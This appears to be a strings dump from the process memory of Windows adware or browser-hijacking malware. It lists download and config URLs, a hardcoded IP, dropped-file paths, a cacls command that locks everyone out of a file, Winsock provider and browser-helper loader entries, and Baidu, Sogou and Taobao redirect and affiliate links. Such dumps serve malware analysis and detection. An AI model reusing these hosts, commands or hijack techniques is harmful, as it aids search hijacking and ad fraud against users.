ws2_32.dll
ntdll.dll
LoadPE(ntdll.dll)
IP:%s,Mac:X-X-X-X-X-X
SendTo NtDeviceIoControlFile Status:X
Status:X
Call NtDeviceIoControlFile, X
RecvFrom NtDeviceIoControlFile Status:X
%m/%d/%y
%H:%M:%S
%I:%M:%S %p
%x %X
Send File:%s
Open File:%s
send_count:%d
Tcp Accept Thread Exit.
:recv_len=%d
Tcp Accept Thread Proc
recv_len:%d
Tcp Accept Thread Start.
diff:%d timeout:%d
AddPeer cid:X TimeOut:%d IsTimeOut:%d
cid:X
~CUdpPeer()
, type:%d size:%d %d crc:X X ver:%d %d
Send SendRecvOK phdr->id:X phdr->type:%d
send_broadcast 0xFFFFFFFF ret:%d
send_broadcast ret:%d
TCP_PORT
UDP_PORT
TCP_PROTO_VER
UDP_PROTO_VER
RandBind port:%d
SetLockTimer index:%d uElapse:%d
Lock index:%d Hash:X Tick:%I64d OldStatus:%d
Keep m_TaskMutex[%d].Name=X
SendKeepPacket index:%d
re send id:X nSend:%d ret:%d to:%d.%d.%d.%d:%d
m_TaskMutex[%d]->res_list.count:%d
OnLockTimeOut m_TaskMutex[%d].Name=X Status:%d lock_perr[%d.%d.%d.%d:%d]
OnKeepTimeOut(%d) nKeepTimeOut:%d
OnRecvOK m_send_list.items:%d id:X
Send ReQueryLock ret:%d
Send QueryLock ret:%d
OnQueryLock %s Index:%d Hash:X
OnReplyLock m_TaskMutex[%d].Name=X Set Peer Info %d.%d.%d.%d:%d
OnReplyLock Set m_TaskMutex[%d].Name=X Status=MUTEX_STATUS_LOCK_FAILD
OnReplyLock m_TaskMutex[%d].Name=X Status:%d
OnLockOk m_TaskMutex[%d].Name=X Set Peer Info %d.%d.%d.%d:%d
OnReplyLockKeep Status:%d
OnDownOk m_TaskMutex[%d].Name=X Peer:%d.%d.%d.%d:%d
OnLockOver m_TaskMutex[%d].Name=X %s
m_TaskMutex[%d]->hDownThread=X
DownLoad(%d)
OnDownLoadOver Status:%d
Begin:X m_Item:X m_run:X m_End:X
FILE_TYPE_EXE cfg_idx:%d
FILE_TYPE_CFG bin_idx:%d
OnDownLoadModuleOver(X,%d) file_type:%d
index:%d time_out:%d down_time:M-d-d d:d:d
OnDownLoadCfgOver(X,%d)
cfg_md5: %s
cfg_url: %s
md5 : %s
url : %s
cfg_url
group:[%s]
idx:%d igroup:%d
Add Cfg Mutex:%s
Add Copy Cfg Mutex:%s
Add Bin Mutex:%s
Add Copy Bin Mutex:%s
Call End Fun:X ret:%d
NotInit:%d LockCount:%d NotRun:%d m_TaskMutex.size()=%d
NotInit:%d LockCount:%d NotRun:%d
%WinDir%\share\
58lm/temptation.bin
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\EXE_temp3.exe
GetCPInfo
RegCreateKeyExA
RegEnumKeyExA
RegCreateKeyA
RegOpenKeyA
RegCloseKey
UrlUnescapeA
InternetCrackUrlA
InternetCanonicalizeUrlA
.text
`.rdata
@.data
.reloc
KERNEL32.DLL
iphlpapi.dll
PSAPI.DLL
SHELL32.dll
SHLWAPI.dll
USER32.dll
WININET.dll
WS2_32.dll
P2PDLL.dll
MSAFD Tcpip [TCP/IP]
MSAFD Tcpip [UDP/IP]
MSAFD Tcpip [RAW/IP]
RSVP UDP Service Provider
\Device\NetBT_Tcpip
RSVP TCP Service Provider
MSAFD NetBIOS [\Device\NetBT_Tcpip_{01593444-4DB3-4CEB-A054-D07FB68368D6}] SEQPACKET 0
MSAFD NetBIOS [\Device\NetBT_Tcpip_{01593444-4DB3-4CEB-A054-D07FB68368D6}] DATAGRAM 0
MSAFD NetBIOS [\Device\NetBT_Tcpip_{4CBD1967-6C39-4808-987E-2ACE8650DA25}] SEQPACKET 1
MSAFD NetBIOS [\Device\NetBT_Tcpip_{4CBD1967-6C39-4808-987E-2ACE8650DA25}] DATAGRAM 1
MSAFD NetBIOS [\Device\NetBT_Tcpip_{152A0A5A-25FD-438F-BF04-B180CF0B9BAD}] SEQPACKET 2
MSAFD NetBIOS [\Device\NetBT_Tcpip_{152A0A5A-25FD-438F-BF04-B180CF0B9BAD}] DATAGRAM 2
tv_w32.dll
indicdll.dll
mshtml.dll
shell32.dll
msctfime.ime
msctf.dll
uxtheme.dll
RegQueryValueExW %s
RegOpenKeyExW:%s
RegisterWindowMessageW:%s

objs.exe_3332:

__MSVCRT_HEAP_SELECT
user32.dll
inflate 1.2.3 Copyright 1995-2005 Mark Adler
OLEACC.dll
PSAPI.DLL
phlpapi.dll
127.0.0.1
msvcrt
1.2.3
User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
bytes=%d-%d
bytes=%d-
HTTP/
HTTP/
http://get.woai310.com/getconfig/minisite.ini
Content-Type: application/x-www-form-urlencoded
http://
WebClientWindow
WebBrowserPointer
http://site.minimenhu.com/sh/index.html
%WinDir%\share\rsvp\objs.exe
GetProcessHeap
GetCPInfo
UrlUnescapeA
EnumChildWindows
EnumWindows
InternetCanonicalizeUrlA
InternetCrackUrlA
.text
`.rdata
@.data
KERNEL32.DLL
ole32.dll
OLEAUT32.dll
SHLWAPI.dll
USER32.dll
WININET.dll
WS2_32.dll

EXE_temp3.exe_816_rwx_00401000_0008D000:


EXE_temp3.exe_816_rwx_00DC0000_00053000:

__MSVCRT_HEAP_SELECT
inflate 1.2.3 Copyright 1995-2005 Mark Adler
iexplore.exe
%Program Files%\Internet Explorer\iexplore.exe
explorer.exe
igfxsrvc.exe
{5D562E5F-741F-4b50-AB7B-7A997CEB9557}
{XXXX-XX-XX-XX-XXXXXX}
cacls.exe "%s" /e /d everyone
%Program Files%\E-yoo\EyooSechelper2.dll
http://
XXXXXXXXXXXXXXXX
Software\Microsoft\Windows\ShellNoRoam\TempCache
Software\Microsoft\Windows\ShellNoRoam\ShellCache
herollq.exe
WebPlayer2010.exe
VODPlayer.exe
JSKPBrowser.exe
ValeBrowser.exe
wmconfig.exe
NewBho.DLL
\ext\settings\{11f09afe-75ad-4e52-ab43-e09e9351ce17}
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\WCom Object
software\policies\microsoft\windows nt\dnsclient
ws2_32.dll
ole32.dll
ieui.dll
mshtml.dll
IEFrame.dll
iertutil.dll
User32.dll
SHLWAPI.dll
wininet.dll
urlmon.dll
mswsock.dll
ws2help.dll
RegOpenKeyExA
RegOpenKeyExW
NtQueryValueKey
NtOpenKey
ADVAPI32.dll
ntdll.dll
Kernel32.dll
dnsapi.dll
msvcrt
PubwinClient.exe
RunMe.exe
{11F09AFE-75AD-4E52-AB43-E09E9351CE17}
Shell.User\Group
oleaut32.dll
browseti.dll
hinthk.dll
rpcrt4.dll
kernel32.dll
{xxxx-xx-xx-xx-xxxxxx}
Shell.Dusn
1.2.3
User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
bytes=%d-%d
bytes=%d-
HTTP/
HTTP/
ZwQueryValueKey
ZwOpenKey
SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}
xxxxxx
118.145.16.80
%SystemRoot%\System32\mswsock.dll
Tcpip
SupportedNameSpace
%SystemRoot%\System32\winrnr.dll
%SystemRoot%\system32\mswsock.dll
%SystemRoot%\system32\rsvpsp.dll
|%SystemRoot%\system32\rsvpsp.dll
shdocvw.dll
ieframe.dll
http://www.sogou.com/sogou?query=
sogou-netb-xx-d
%%X
HttpAddRequestHeadersW
HttpAddRequestHeadersA
HttpSendRequestW
HttpSendRequestA
HttpOpenRequestW
HttpOpenRequestA
HttpAddRequestHeaders
\StringFileInfo\xx\%s
user32.dll
HTTP/1.
HTTP/1.1 302 Moved Temporarily
http://www.baidu.com/s? tn=
http://www.baidu.com/
http://www.sogou.com/sogou? pid=
http://www.sogou.com/index. pid=
http://rlt.inte.sogou.com/
%System%\DqKgbb.dll
{6795ED75-58AA-8E4C-A8EA-3CAD7C47AB03}
GetProcessHeap
WinExec
GetCPInfo
RegDeleteKeyA
RegQueryInfoKeyA
RegEnumKeyExA
RegCreateKeyExA
RegCreateKeyA
RegOpenKeyA
RegCloseKey
UrlUnescapeA
EnumWindows
SetWindowsHookExA
EnumChildWindows
InternetCanonicalizeUrlA
InternetCrackUrlA
`.rdata
@.data
.reloc
KERNEL32.DLL
iphlpapi.dll
OLEAUT32.dll
PSAPI.DLL
USER32.dll
VERSION.dll
WININET.dll
WS2_32.dll
Loader.dll
{9a4dda61-1d3a-49b7-9849-dac6cd30a393}
AutoConfigURL
_IID_IWEBBROWSER
ikeeper.dll
rsvpsp.dll
nwprovau.dll
winrnr.dll

EXE_temp3.exe_816_rwx_00E50000_0006F000:

__MSVCRT_HEAP_SELECT
user32.dll
HTTP/1.0
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
uncompress res:%d des_len:%d
uncompress x:X src_len:%d des_len:%d
uncompress crc:X X
WINDOWS
iexplore.exe 360se.exe miniie.exe TangoWeb.exe sogouexplorer.exe TheWorld.exe maxthon.exe baidubrowser.exe browser.exe
.exe ruiying.exe yiyun.exe
, X
Invoke hr:X nArgErr:%d
GetIDsOfNames:%s hr:X dispID:%d
hProcess:X %d
cmd:%s
SetCreateParentProcessId:X
%d.%d.%d
UDP_PROTO_VER
TCP_PROTO_VER
%d.%d.%d.%d
init my_ip_addr: %d.%d.%d.%d
IP: %d.%d.%d.%d
item my_ip_addr: %d.%d.%d.%d
item hWnd:X user:%s
cmd_ip
cmd_user
cmd_ps
cmd_region
BHOLoader_InitDll Result:%d
LoaderCmdLine:%s
.webkjs
Shell.User\BKK
CreateExeShortcut hr:%d
iexplore.exe
start ret:%d
start:X
is_bholoader:%d enter:%s loaddll:%s
Shell.User
Shell.User\Group
" link="http://www.sogou.com/sogou?pid=%s&query=%%s" icon="207" />
param:%s
[%s],
call entry ret:%d
entry addr:X %s
%s addr:X %s
(%d).%s
run_rate :%d
ip_addr :%s
ngroup :%d
cfg_file :%s
bin_file :%s
root_path:%s
igroup :%d
ini :X
kvs :X
gkvs :X
user :%s
hWnd :X
%s%sX%s
CreateExeShortcut Save To:%s
CreateExeShortcut nIndex:%d
CreateExeShortcut pszArgs:%s
CreateExeShortcut pszExeFile:%s
CreateExeShortcut pszWorkerDir:%s
CreateExeShortcut pszDescription:%s
CreateExeShortcut QueryInterface IID_IPersistFile ok
CreateExeShortcut pLink:X
PostClientInfo_Thread:X
,bRet:%d StatusCode:%d
www.dskjkl.com
First_PostClientInfo_Thread:X
/sp/callnew.aspx?
www.58lianmeng.com
XXXXXXXXXXXXXXXX
ddddddd
010203040506
.text
`.bss
.rdata
@.data
.reloc
KERNEL32.dll
.rsrc
.data
kernel32.dll
PEPack.dll
%s : X
More information: http://www.ibsensoftware.com/
GetProcAddress PackTheFile OK Addr:X
GetProcAddress SetFlags OK Addr:X
kind:X posguid:X
MSFT_TypeInfoBase Size:%d
MSFT_Header Size:X
bGetClsID:%d bGetIID:%d
GetClsIDAndIIDFromModuleHandle bRet:%d
TypeLib Res size:%d
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\EXE_temp3.exe
GetProcessHeap
GetCPInfo
RegCloseKey
RegCreateKeyA
HttpOpenRequestA
HttpQueryInfoA
HttpSendRequestA
`.rdata
KERNEL32.DLL
ADVAPI32.dll
ole32.dll
OLEAUT32.dll
SHELL32.dll
USER32.dll
WININET.dll
P2PRun.dll

EXE_temp3.exe_816_rwx_00ED0000_00009000:


EXE_temp3.exe_816_rwx_010E1000_00031000:

__MSVCRT_HEAP_SELECT
user32.dll
USER32.dll
ADVAPI32.dll
PSAPI.DLL
Length:%d opcode X offset:%d
KERNEL32.DLL
GDI32.dll
iphlpapi.dll
ole32.dll
SHELL32.dll
SHLWAPI.dll
WININET.dll
WS2_32.dll
UrlUnescapeA
InternetCrackUrlA
DeskIcon.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\EXE_temp3.exe
.rsrc
COMCTL32.dll
MFC42.DLL
MSVCP60.dll
MSVCRT.dll
OLEAUT32.dll
VERSION.dll
RegOpenKeyA
GetCPInfo
.text
`.rdata
@.data
@.reloc
Microsoft(R) Windows(R) Operating System
6, 0, 2900, 5512
6.00.2900.5512

EXE_temp3.exe_816_rwx_01120000_00023000:

lnc.HtM
__MSVCRT_HEAP_SELECT
user32.dll
-id:%u -cfg:%s
%u=%s
%s%s.ico
http://www.58lianmeng.com/sp/call.aspx?username=
http://icon.woai310.com/client/config.ini
%s%s.exe
bytes=%d-%d
bytes=%d-
HTTP/
HTTP/
xxxxxx
_WINICOMSG_
ATL:X
127.0.0.1
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
http://s.click.taobao.com/t_js?tu=
detail.tmall.com
application/x-www-form-urlencoded
User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
http://icon.woai310.com/?do=post&u=%s&m=%s&c=%d&s=%d&k=1&r=%s&v=%s&p=%s
%Documents and Settings%\%current user%\Local Settings\Temp\Sawrdxeyd.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\EXE_temp3.exe
GetCPInfo
GetProcessHeap
UrlUnescapeA
InternetCanonicalizeUrlA
InternetCrackUrlA
.text
`.rdata
@.data
.reloc
KERNEL32.DLL
ADVAPI32.dll
GDI32.dll
iphlpapi.dll
ole32.dll
SHELL32.dll
SHLWAPI.dll
USER32.dll
WININET.dll
WS2_32.dll
DeskIcon.dll

EXE_temp3.exe_816_rwx_10001000_0002E000:

__MSVCRT_HEAP_SELECT
user32.dll
PSAPI.DLL
KERNEL32.DLL
ADVAPI32.dll
iphlpapi.dll
ole32.dll
OLEAUT32.dll
SHLWAPI.dll
USER32.dll
VERSION.dll
WININET.dll
WS2_32.dll
Loader.dll
Base:X
DLL_PROCESS_ATTACH %d
Length:%d opcode X offset:%d
MsgDebugView
%System%\DqKgbb.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\EXE_temp3.exe
GetProcessHeap
GetCPInfo
.text
`.rdata
@.data
.reloc

objs.exe_3332_rwx_00401000_0001E000:


objs.exe_3332_rwx_00950000_00053000:

6.00.3790.4324 (srv03_sp2_qfe.080630-1205)
6.00.3790.4357 (srv03_sp2_gdr.080819-1207)
6.00.3790.4357 (srv03_sp2_qfe.080819-1207)
6.00.3790.4392 (srv03_sp2_gdr.081016-1620)
6.00.3790.4392 (srv03_sp2_qfe.081016-1620)
6.00.3790.4470 (srv03_sp2_gdr.090303-1204)
6.00.3790.4470 (srv03_sp2_qfe.090303-1204)
6.00.3790.4504 (srv03_sp2_gdr.090428-1405)
6.00.3790.4504 (srv03_sp2_qfe.090428-1405)
6.00.3790.4539 (srv03_sp2_gdr.090626-1428)
6.00.3790.4539 (srv03_sp2_qfe.090626-1428)
6.00.3790.4589 (srv03_sp2_gdr.090914-1233)
6.00.3790.4589 (srv03_sp2_qfe.090914-1233)
6.00.3790.4672 (srv03_sp2_gdr.100225-1230)
6.00.3790.4672 (srv03_sp2_qfe.100225-1230)
6.00.3790.4696 (srv03_sp2_gdr.100419-1942)
6.00.3790.4732 (srv03_sp2_gdr.100623-0356)
6.00.3790.4732 (srv03_sp2_qfe.100623-0356)
6.00.3790.4772 (srv03_sp2_gdr.100908-1010)
6.00.3790.4772 (srv03_sp2_qfe.100908-1010)
6.00.3790.4795 (srv03_sp2_qfe.101103-0357)
6.00.3790.4807 (srv03_sp2_gdr.101220-0307)
6.00.3790.4807 (srv03_sp2_qfe.101220-0307)
6.00.3790.4835 (srv03_sp2_gdr.110222-0239)
6.00.3790.4835 (srv03_sp2_qfe.110222-0239)
6.00.3790.4857 (srv03_sp2_gdr.110425-0335)
6.00.3790.4857 (srv03_sp2_qfe.110425-0335)
6.00.3790.4879 (srv03_sp2_gdr.110621-0342)
6.00.3790.4879 (srv03_sp2_qfe.110621-0342)
6.00.3790.4904 (srv03_sp2_gdr.110905-0334)
6.00.3790.4904 (srv03_sp2_qfe.110905-0334)
6.00.3790.4929 (srv03_sp2_gdr.111104-0342)
6.00.3790.4929 (srv03_sp2_qfe.111104-0342)
6.00.3790.4944 (srv03_sp2_gdr.111216-0308)
6.00.3790.4944 (srv03_sp2_qfe.111216-0308)
6.00.3790.4969 (srv03_sp2_gdr.120228-0234)
6.00.3790.4969 (srv03_sp2_qfe.120228-0234)
6.00.3790.5004 (srv03_sp2_gdr.120515-0336)
6.00.3790.5004 (srv03_sp2_qfe.120515-0336)
6.00.3790.5029 (srv03_sp2_gdr.120628-0335)
6.00.3790.5029 (srv03_sp2_qfe.120628-0335)
6.00.3790.5060 (srv03_sp2_gdr.120824-0334)
6.00.3790.5060 (srv03_sp2_qfe.120824-0334)
6.00.3790.5080 (srv03_sp2_gdr.121026-1534)
6.00.3790.5080 (srv03_sp2_qfe.121026-1534)
HTTP/1.
HTTP/1.1 302 Moved Temporarily
http://www.baidu.com/s? tn=
http://www.baidu.com/
http://www.sogou.com/sogou? pid=
http://www.sogou.com/index. pid=
http://rlt.inte.sogou.com/
MSAFD Tcpip [TCP/IP]
MSAFD Tcpip [UDP/IP]
MSAFD Tcpip [RAW/IP]
RSVP UDP Service Provider
\Device\NetBT_Tcpip
RSVP TCP Service Provider
MSAFD NetBIOS [\Device\NetBT_Tcpip_{01593444-4DB3-4CEB-A054-D07FB68368D6}] SEQPACKET 0
MSAFD NetBIOS [\Device\NetBT_Tcpip_{01593444-4DB3-4CEB-A054-D07FB68368D6}] DATAGRAM 0
MSAFD NetBIOS [\Device\NetBT_Tcpip_{4CBD1967-6C39-4808-987E-2ACE8650DA25}] SEQPACKET 1
MSAFD NetBIOS [\Device\NetBT_Tcpip_{4CBD1967-6C39-4808-987E-2ACE8650DA25}] DATAGRAM 1
MSAFD NetBIOS [\Device\NetBT_Tcpip_{152A0A5A-25FD-438F-BF04-B180CF0B9BAD}] SEQPACKET 2
MSAFD NetBIOS [\Device\NetBT_Tcpip_{152A0A5A-25FD-438F-BF04-B180CF0B9BAD}] DATAGRAM 2
tv_w32.dll
indicdll.dll
mshtml.dll
shell32.dll
msctfime.ime
msctf.dll
uxtheme.dll
Microsoft(R) Windows(R) Operating System
6, 0, 2900, 5512
6.00.2900.5512

dsau.exe_3672_rwx_00960000_00009000:


dsau.exe_3672_rwx_00CA0000_00053000:


acsvc.exe_2168_rwx_10001000_0002E000:


Explorer.EXE_1752_rwx_00FF0000_00004000:


Explorer.EXE_1752_rwx_01D80000_00005000:


Explorer.EXE_1752_rwx_01E61000_0002F000:


Explorer.EXE_1752_rwx_020C0000_00053000:

HttpSendRequestW
HttpSendRequestA
HttpOpenRequestW
HttpOpenRequestA
HttpAddRequestHeaders
\StringFileInfo\xx\%s
user32.dll
6.0.2800.1106
6.00.2600.0000
6.00.2600.0000 (xpclient.010817-1148)
6.00.2737.800
6.00.2800.1106
6.00.2800.1106 (xpsp1.020828-1920)
6.00.2800.1400
6.00.2800.1485
6.00.2800.1496
6.00.2800.1603
6.00.2800.1607
6.00.2800.1611
6.00.2800.1615
6.00.2800.1617
6.00.2800.1623
6.00.2800.1627
6.00.2800.1632
6.00.2800.1644
6.00.2800.1649
6.00.2800.1650
6.00.2900.2180 (xpsp_sp2_rtm.040803-2158)
6.00.2900.2518 (xpsp.040919-1030)
6.00.2900.2518 (xpsp_sp2_gdr.040919-1056)
6.00.2900.2577 (xpsp_sp2_gdr.041130-1729)
6.00.2900.2598 (xpsp.041130-1728)
6.00.2900.2627 (xpsp.050309-1719)
6.00.2900.2627 (xpsp_sp2_gdr.050309-1648)
6.00.2900.2668 (xpsp.050430-1553)
6.00.2900.2668 (xpsp_sp2_gdr.050430-1553)
6.00.2900.2713 (xpsp.050702-1518)
6.00.2900.2713 (xpsp_sp2_gdr.050702-1513)
6.00.2900.2753 (xpsp.050902-1331)
6.00.2900.2781 (xpsp.051020-1728)
6.00.2900.2781 (xpsp_sp2_gdr.051020-1730)
6.00.2900.2823 (xpsp.060106-1527)
6.00.2900.2823 (xpsp_sp2_gdr.060106-1520)
6.00.2900.2861 (xpsp.060303-1528)
6.00.2900.2861 (xpsp_sp2_gdr.060303-1517)
6.00.2900.2904 (xpsp.060509-0230)
6.00.2900.2904 (xpsp_sp2_gdr.060509-0218)
6.00.2900.2937 (xpsp.060623-0011)
6.00.2900.2937 (xpsp_sp2_gdr.060623-0002)
6.00.2900.2995 (xpsp.060913-0019)
6.00.2900.2995 (xpsp_sp2_gdr.060913-0010)
6.00.2900.3020 (xpsp.061023-0222)
6.00.2900.3020 (xpsp_sp2_gdr.061023-0214)
6.00.2900.3059 (xpsp_sp2_gdr.070104-0050)
6.00.2900.3059 (xpsp_sp2_qfe.070104-0040)
6.00.2900.3086 (xpsp_sp2_gdr.070218-2314)
6.00.2900.3086 (xpsp_sp2_qfe.070218-2342)
6.00.2900.3121 (xpsp_sp2_gdr.070418-1302)
6.00.2900.3121 (xpsp_sp2_qfe.070418-1302)
6.00.2900.3164 (xpsp_sp2_gdr.070626-1259)
6.00.2900.3164 (xpsp_sp2_qfe.070626-1258)
6.00.2900.3199 (xpsp_sp2_gdr.070821-1257)
6.00.2900.3199 (xpsp_sp2_qfe.070821-1250)
6.00.2900.3231 (xpsp_sp2_gdr.071010-1320)
6.00.2900.3231 (xpsp_sp2_qfe.071010-1316)
6.00.2900.3268 (xpsp_sp2_gdr.071206-1518)
6.00.2900.3268 (xpsp_sp2_qfe.071206-1251)
6.00.2900.3300 (xpsp.080125-2028)
6.00.2900.3314 (xpsp_sp2_gdr.080215-1241)
6.00.2900.3314 (xpsp_sp2_qfe.080215-1242)
6.00.2900.3354 (xpsp_sp2_gdr.080417-1412)
6.00.2900.3354 (xpsp_sp2_qfe.080417-1416)
6.00.2900.3395 (xpsp_sp2_gdr.080623-1307)
6.00.2900.3395 (xpsp_sp2_qfe.080623-1318)
6.00.2900.3429 (xpsp_sp2_gdr.080819-1231)
6.00.2900.3429 (xpsp_sp2_qfe.080819-1244)
6.00.2900.3462 (xpsp_sp2_gdr.081015-1244)
6.00.2900.3462 (xpsp_sp2_qfe.081015-1657)
6.00.2900.3527 (xpsp_sp2_gdr.090219-1253)
6.00.2900.3527 (xpsp_sp2_qfe.090219-1311)
6.00.2900.3562 (xpsp_sp2_gdr.090427-1232)
6.00.2900.3562 (xpsp_sp2_qfe.090427-1240)
6.00.2900.3592 (xpsp_sp2_gdr.090622-1453)
6.00.2900.3592 (xpsp_sp2_qfe.090622-1503)
6.00.2900.3627 (xpsp_sp2_gdr.090918-1238)
6.00.2900.3627 (xpsp_sp2_qfe.090918-1245)
6.00.2900.3640 (xpsp_sp2_gdr.091027-1355)
6.00.2900.3640 (xpsp_sp2_qfe.091027-1402)
6.00.2900.3660 (xpsp_sp2_gdr.091216-1517)
6.00.2900.3660 (xpsp_sp2_qfe.091216-1705)
6.00.2900.3676 (xpsp_sp2_gdr.100225-1250)
6.00.2900.3676 (xpsp_sp2_qfe.100225-1434)
6.00.2900.3698 (xpsp_sp2_gdr.100416-1705)
6.00.2900.3698 (xpsp_sp2_qfe.100416-1708)
6.00.2900.5512 (xpsp.080413-2105)
6.00.2900.5583 (xpsp_sp3_gdr.080417-1430)
6.00.2900.5583 (xpsp_sp3_qfe.080417-1431)
6.00.2900.5626 (xpsp_sp3_gdr.080623-1315)
6.00.2900.5626 (xpsp_sp3_qfe.080623-1331)
6.00.2900.5659 (xpsp_sp3_gdr.080819-1237)
6.00.2900.5659 (xpsp_sp3_qfe.080819-1352)
6.00.2900.5694 (xpsp_sp3_gdr.081015-1312)
6.00.2900.5694 (xpsp_sp3_qfe.081015-1409)
6.00.2900.5764 (xpsp_sp3_gdr.090219-1240)
6.00.2900.5764 (xpsp_sp3_qfe.090219-1311)
6.00.2900.5803 (xpsp_sp3_gdr.090428-1325)
6.00.2900.5803 (xpsp_sp3_qfe.090428-1347)
6.00.2900.5835 (xpsp_sp3_gdr.090626-1535)
6.00.2900.5835 (xpsp_sp3_qfe.090626-1600)
6.00.2900.5880 (xpsp_sp3_gdr.090924-1438)
6.00.2900.5880 (xpsp_sp3_qfe.090924-1448)
6.00.2900.5897 (xpsp_sp3_gdr.091028-1650)
6.00.2900.5897 (xpsp_sp3_qfe.091028-1717)
6.00.2900.5921 (xpsp_sp3_gdr.091221-1718)
6.00.2900.5921 (xpsp_sp3_qfe.091221-1752)
6.00.2900.5945 (xpsp_sp3_gdr.100225-1251)
6.00.2900.5945 (xpsp_sp3_qfe.100225-1321)
6.00.2900.5969 (xpsp_sp3_gdr.100416-1716)
6.00.2900.5969 (xpsp_sp3_qfe.100416-1736)
6.00.2900.6003 (xpsp_sp3_gdr.100623-1635)
6.00.2900.6003 (xpsp_sp3_qfe.100623-1636)
6.00.2900.6036 (xpsp_sp3_gdr.100908-2023)
6.00.2900.6036 (xpsp_sp3_qfe.100908-2019)
6.00.2900.6049 (xpsp_sp3_gdr.101103-1638)
6.00.2900.6049 (xpsp_sp3_qfe.101103-1636)
6.00.2900.6058 (xpsp_sp3_gdr.101220-1709)
6.00.2900.6058 (xpsp_sp3_qfe.101220-1651)
6.00.2900.6082 (xpsp_sp3_gdr.110217-1622)
6.00.2900.6082 (xpsp_sp3_qfe.110217-1621)
6.00.2900.6104 (xpsp_sp3_gdr.110425-1624)
6.00.2900.6104 (xpsp_sp3_qfe.110425-1624)
6.00.2900.6126 (xpsp_sp3_gdr.110621-1627)
6.00.2900.6126 (xpsp_sp3_qfe.110621-1627)
6.00.2900.6148 (xpsp_sp3_gdr.110905-1615)
6.00.2900.6148 (xpsp_sp3_qfe.110905-1615)
6.00.2900.6168 (xpsp_sp3_gdr.111101-1829)
6.00.2900.6168 (xpsp_sp3_qfe.111101-1828)
6.00.2900.6182 (xpsp_sp3_gdr.111216-1642)
6.00.2900.6182 (xpsp_sp3_qfe.111216-1630)
6.00.2900.6197 (xpsp_sp3_gdr.120228-1720)
6.00.2900.6197 (xpsp_sp3_qfe.120228-1721)
6.00.2900.6228 (xpsp_sp3_gdr.120515-1618)
6.00.2900.6228 (xpsp_sp3_qfe.120515-1618)
6.00.2900.6254 (xpsp_sp3_gdr.120628-1618)
6.00.2900.6254 (xpsp_sp3_qfe.120628-1619)
6.00.2900.6287 (xpsp_sp3_gdr.120828-1631)
6.00.2900.6287 (xpsp_sp3_qfe.120828-1626)
6.00.2900.6309 (xpsp_sp3_gdr.121031-1323)
6.00.2900.6309 (xpsp_sp3_qfe.121031-1323)
6.00.2900.6357 (xpsp_sp3_gdr.130221-0418)
6.00.3790.0 (srv03_rtm.030324-2048)
6.00.3790.118 (srv03_gdr.031205-1652)
6.00.3790.118 (srv03_qfe.031205-1652)
6.00.3790.1830 (srv03_sp1_rtm.050324-1447)
6.00.3790.186 (srv03_gdr.040410-1234)
6.00.3790.186 (srv03_qfe.040410-1236)
6.00.3790.2509 (srv03_sp1_gdr.050815-1517)
6.00.3790.2653 (srv03_sp1_gdr.060303-1536)
6.00.3790.2653 (srv03_sp1_qfe.060303-1552)
6.00.3790.2732 (srv03_sp1_gdr.060623-0310)
6.00.3790.2732 (srv03_sp1_qfe.060623-0318)
6.00.3790.2817 (srv03_sp1_gdr.061023-0100)
6.00.3790.2993 (srv03_sp1_gdr.070817-1316)
6.00.3790.2993 (srv03_sp1_qfe.070817-1316)
6.00.3790.3041 (srv03_sp1_gdr.071107-1901)
6.00.3790.3041 (srv03_sp1_qfe.071107-1901)
6.00.3790.3091 (srv03_sp1_gdr.080215-1206)
6.00.3790.3091 (srv03_sp1_qfe.080215-1206)
6.00.3790.3194 (srv03_sp1_gdr.080819-1207)
6.00.3790.3194 (srv03_sp1_qfe.080819-1207)
6.00.3790.3229 (srv03_sp1_gdr.081016-1620)
6.00.3790.3229 (srv03_sp1_qfe.081016-1620)
6.00.3790.3304 (srv03_sp1_gdr.090303-1204)
6.00.3790.3304 (srv03_sp1_qfe.090303-1204)
6.00.3790.3959 (srv03_sp2_rtm.070216-1710)
6.00.3790.4186 (srv03_sp2_gdr.071108-1306)
6.00.3790.4186 (srv03_sp2_qfe.071108-1306)
6.00.3790.4210 (srv03_sp2_qfe.071221-1418)
6.00.3790.4237 (srv03_sp2_gdr.080215-1206)
6.00.3790.4237 (srv03_sp2_qfe.080215-1206)
6.00.3790.4275 (srv03_sp2_gdr.080417-1307)
6.00.3790.4275 (srv03_sp2_qfe.080417-1307)
6.00.3790.4324 (srv03_sp2_qfe.080630-1205)
6.00.3790.4357 (srv03_sp2_gdr.080819-1207)
6.00.3790.4357 (srv03_sp2_qfe.080819-1207)
6.00.3790.4392 (srv03_sp2_gdr.081016-1620)
6.00.3790.4392 (srv03_sp2_qfe.081016-1620)
6.00.3790.4470 (srv03_sp2_gdr.090303-1204)
6.00.3790.4470 (srv03_sp2_qfe.090303-1204)
6.00.3790.4504 (srv03_sp2_gdr.090428-1405)
6.00.3790.4504 (srv03_sp2_qfe.090428-1405)
6.00.3790.4539 (srv03_sp2_gdr.090626-1428)
6.00.3790.4539 (srv03_sp2_qfe.090626-1428)
6.00.3790.4589 (srv03_sp2_gdr.090914-1233)
6.00.3790.4589 (srv03_sp2_qfe.090914-1233)
6.00.3790.4672 (srv03_sp2_gdr.100225-1230)
6.00.3790.4672 (srv03_sp2_qfe.100225-1230)
6.00.3790.4696 (srv03_sp2_gdr.100419-1942)
6.00.3790.4732 (srv03_sp2_gdr.100623-0356)
6.00.3790.4732 (srv03_sp2_qfe.100623-0356)
6.00.3790.4772 (srv03_sp2_gdr.100908-1010)
6.00.3790.4772 (srv03_sp2_qfe.100908-1010)
6.00.3790.4795 (srv03_sp2_qfe.101103-0357)
6.00.3790.4807 (srv03_sp2_gdr.101220-0307)
